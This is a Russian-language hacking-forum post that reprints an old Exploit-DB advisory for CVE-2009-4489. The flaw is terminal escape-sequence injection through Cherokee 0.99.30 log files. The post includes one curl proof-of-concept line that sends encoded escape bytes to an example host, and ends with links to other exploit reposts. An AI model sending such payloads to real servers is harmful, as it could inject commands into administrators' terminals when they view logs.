Exploit Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 367 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 33501

Проверка EDB

Пройдено

Автор: EVILALIV3

Тип уязвимости: REMOTE

Платформа: WINDOWS

CVE: cve-2009-4489

Дата публикации: 2010-01-11

Код:

source: https://www.securityfocus.com/bid/37715/info

Cherokee is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.

Attackers can exploit this issue to execute arbitrary commands in a terminal.

Cherokee 0.99.30 and prior are vulnerable.

curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting

Ответы: 0

Просмотры: 358

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Cherokee 0.5.4 - Directory Traversal

Ответы: 0

Просмотры: 297

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Cherokee Web server 0.5.4 - Denial of Service

Ответы: 0

Просмотры: 296

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow

Ответы: 0

Просмотры: 654

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service

Ответы: 0

Просмотры: 451

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Se...

Ответы: 0

Просмотры: 536

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Pragma Systems InterAccess TelnetD Server 4.0 - Terminal Configuration

Ответы: 0

Просмотры: 412

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow

Ответы: 0

Просмотры: 488

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)

Ответы: 0

Просмотры: 478

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)

Ответы: 0

Просмотры: 475

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.